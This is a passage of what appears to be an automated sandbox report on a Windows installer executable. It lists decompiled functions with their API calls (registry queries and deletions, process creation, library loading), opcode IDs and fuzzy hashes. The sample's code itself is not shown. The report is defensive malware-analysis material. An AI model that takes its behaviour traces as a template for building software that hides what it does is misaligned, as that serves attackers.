                                                              • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                              Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
                                                              • RegCloseKey.KERNELBASE(?), ref: 00406476
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Exec
                                                              • API String ID: 3356406503-459137531
                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                              Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                                              • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                              • Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                                              • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                              Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Exec
                                                              • API String ID: 3394109436-459137531
                                                              • Opcode ID: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                                              • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                                              • Opcode Fuzzy Hash: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                                              • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                                              Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                              • lstrlenW.KERNEL32 ref: 00402344
                                                              • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                              • String ID:
                                                              • API String ID: 1486964399-0
                                                              • Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                                              • Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
                                                              • Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                                              • Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59
                                                              Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseValue
                                                              • String ID:
                                                              • API String ID: 397863658-0
                                                              • Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                                              • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                                              • Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                                              • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                                              Function 0040202F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                              • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                              • String ID:
                                                              • API String ID: 2520467145-0
                                                              • Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                                              • Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
                                                              • Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                                              • Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64
                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                              • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                              • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                              • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                              Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                                              • Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
                                                              • Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                                              • Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D
                                                              Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                                              • GetLastError.KERNEL32 ref: 00405AFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                              Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                              • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3712363035-0
                                                              • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                              • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                              • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                              • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                              Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                              Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                              Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
